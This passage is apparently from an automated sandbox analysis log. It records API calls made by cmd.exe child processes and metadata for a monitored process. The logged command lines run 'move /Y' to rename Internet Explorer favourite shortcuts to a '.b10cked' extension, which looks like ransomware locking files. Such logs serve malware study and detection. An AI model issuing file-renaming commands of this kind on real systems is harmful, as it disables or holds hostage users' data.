lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x0, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x4) returned 0x0 
[0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0213.919] RegCloseKey (hKey=0x40) returned 0x0 [0213.919] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eccc | out: phkResult=0x20eccc*=0x40) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x0, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.919] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x9, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.920] RegQueryValueExW (in: hKey=0x40, 
lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x9, lpcbData=0x20ecd0*=0x4) returned 0x0 [0213.920] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x9, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0213.920] RegCloseKey (hKey=0x40) returned 0x0 [0213.920] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863af [0213.920] srand (_Seed=0x5b8863af) [0213.920] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked\"" [0213.920] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked\"" [0213.920] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.920] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x391910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.921] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.921] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.921] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.921] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.921] _wcsicmp (_String1="PROMPT", 
_String2="ERRORLEVEL") returned 11 [0213.921] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.921] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.921] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.921] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.921] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.921] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0213.921] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.921] GetEnvironmentStringsW () returned 0x392300* [0213.922] FreeEnvironmentStringsW (penv=0x392300) returned 1 [0213.922] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.922] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.922] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.922] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.922] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.922] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.922] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.922] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.922] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0213.922] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.922] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fa98 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.922] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fa98, lpFilePart=0x20fa94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fa94*="Desktop") returned 0x18 [0213.922] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.922] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f814 | out: lpFindFileData=0x20f814) returned 0x390040 [0213.923] FindClose (in: hFindFile=0x390040 | out: hFindFile=0x390040) returned 1 [0213.923] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f814 | out: lpFindFileData=0x20f814) returned 0x390040 [0213.923] FindClose (in: hFindFile=0x390040 | out: hFindFile=0x390040) returned 1 [0213.923] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f814 | out: lpFindFileData=0x20f814) returned 0x390040 [0213.923] FindClose (in: hFindFile=0x390040 | out: hFindFile=0x390040) returned 1 [0213.923] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.923] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0213.923] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0213.923] GetEnvironmentStringsW () returned 0x392b20* [0213.924] FreeEnvironmentStringsW (penv=0x392b20) returned 1 [0213.924] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.924] GetConsoleOutputCP () returned 0x1b5 [0213.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.924] GetUserDefaultLCID () returned 0x409 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fbd8, cchData=128 | out: lpLCData="0") returned 2 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fbd8, cchData=128 | out: lpLCData="0") returned 2 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fbd8, cchData=128 | out: lpLCData="1") 
returned 2 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0213.925] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0213.925] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.927] GetConsoleTitleW (in: lpConsoleTitle=0x380900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.927] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0213.927] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0213.927] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0213.928] _wcsicmp (_String1="move", _String2=")") returned 68 [0213.928] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0213.928] _wcsicmp 
(_String1="FOR/?", _String2="move") returned -7 [0213.928] _wcsicmp (_String1="IF", _String2="move") returned -4 [0213.928] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0213.928] _wcsicmp (_String1="REM", _String2="move") returned 5 [0213.928] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0214.093] GetConsoleTitleW (in: lpConsoleTitle=0x20f8d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.094] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0214.094] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0214.094] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0214.094] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0214.094] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0214.094] _wcsicmp (_String1="move", _String2="CD") returned 10 [0214.094] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0214.094] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0214.094] _wcsicmp (_String1="move", _String2="REN") returned -5 [0214.094] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0214.094] _wcsicmp (_String1="move", _String2="SET") returned -6 [0214.094] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0214.094] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0214.094] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0214.094] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0214.094] _wcsicmp (_String1="move", _String2="MD") returned 11 [0214.094] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0214.094] _wcsicmp (_String1="move", _String2="RD") returned -5 [0214.094] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0214.094] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0214.094] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0214.094] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0214.094] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0214.094] 
_wcsicmp (_String1="move", _String2="CALL") returned 10 [0214.094] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0214.094] _wcsicmp (_String1="move", _String2="VER") returned -9 [0214.094] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0214.094] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0214.094] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0214.095] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0214.095] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0214.095] _wcsicmp (_String1="move", _String2="START") returned -6 [0214.095] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0214.095] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0214.095] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0214.096] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.096] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.096] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f68c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f684, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f684*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0214.097] _wcsnicmp 
(_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0214.097] _wcsnicmp (_String1="COPYCMD", 
_String2="USERNAM", _MaxCount=0x7) returned -18 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0214.098] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0214.098] _wcsicmp (_String1="MICROS~2.URL", _String2=".") returned 63 [0214.098] _wcsicmp (_String1="MICROS~2.URL", _String2="..") returned 63 [0214.098] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\micros~2.url")) returned 0x20 [0214.098] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x391e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.098] SetErrorMode (uMode=0x0) returned 0x0 [0214.098] SetErrorMode (uMode=0x1) returned 0x0 [0214.098] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL", nBufferLength=0x104, lpBuffer=0x20f014, lpFilePart=0x20effc | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL", lpFilePart=0x20effc*="MICROS~2.URL") returned 0x2f [0214.098] SetErrorMode (uMode=0x0) returned 0x1 [0214.098] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1" (normalized: "c:\\users\\default\\favori~1\\micros~1")) returned 0x12 [0214.098] _wcsicmp (_String1="MICROS~2.URL", _String2=".") returned 63 [0214.098] _wcsicmp (_String1="MICROS~2.URL", _String2="..") returned 63 [0214.098] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\micros~2.url")) returned 0x20 [0214.098] SetErrorMode (uMode=0x0) returned 0x0 [0214.098] SetErrorMode (uMode=0x1) returned 0x0 [0214.098] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL", nBufferLength=0x104, lpBuffer=0x20f490, lpFilePart=0x20f228 | out: 
lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL", lpFilePart=0x20f228*="MICROS~2.URL") returned 0x2f [0214.099] SetErrorMode (uMode=0x0) returned 0x1 [0214.099] SetErrorMode (uMode=0x0) returned 0x0 [0214.099] SetErrorMode (uMode=0x1) returned 0x0 [0214.099] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked", nBufferLength=0x104, lpBuffer=0x20f698, lpFilePart=0x20f228 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked", lpFilePart=0x20f228*="Microsoft At Home.url.b10cked") returned 0x40 [0214.099] SetErrorMode (uMode=0x0) returned 0x1 [0214.099] SetLastError (dwErrCode=0x0) [0214.099] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at home.url.b10cked")) returned 0xffffffff [0214.099] GetLastError () returned 0x2 [0214.099] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL", fInfoLevelId=0x1, lpFindFileData=0x20eba4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eba4) returned 0x380ef0 [0214.099] FindNextFileW (in: hFindFile=0x380ef0, lpFindFileData=0x20eba4 | out: lpFindFileData=0x20eba4) returned 0 [0214.099] GetLastError () returned 0x12 [0214.099] FindClose (in: hFindFile=0x380ef0 | out: hFindFile=0x380ef0) returned 1 [0214.100] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL", fInfoLevelId=0x1, lpFindFileData=0x391c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x391c30) returned 0x380ef0 [0214.101] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked", nBufferLength=0x104, lpBuffer=0x20ee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked", lpFilePart=0x0) returned 0x40 [0214.101] 
GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url", nBufferLength=0x104, lpBuffer=0x20ee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url", lpFilePart=0x0) returned 0x38 [0214.101] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at home.url")) returned 0x20 [0214.101] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at home.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at home.url.b10cked"), dwFlags=0x3) returned 1 [0214.101] FindClose (in: hFindFile=0x380ef0 | out: hFindFile=0x380ef0) returned 1 [0214.101] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20edf0 | out: _Buffer=" 1") returned 9 [0214.101] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.101] GetFileType (hFile=0x7) returned 0x2 [0214.102] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.102] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20ed7c | out: lpMode=0x20ed7c) returned 1 [0214.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.102] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20edb0 | out: lpConsoleScreenBufferInfo=0x20edb0) returned 1 [0214.102] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0214.102] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20edf0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0214.102] WriteConsoleW (in: hConsoleOutput=0x7, 
lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20edd4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20edd4*=0x1a) returned 1 [0214.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.103] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.103] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.103] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.103] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.103] SetConsoleInputExeNameW () returned 0x1 [0214.103] GetConsoleOutputCP () returned 0x1b5 [0214.103] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.103] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.103] exit (_Code=0) Process: id = "526" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x990" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31409 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31410 start_va = 0x30000 
end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31411 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31412 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 31413 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31414 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31415 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = 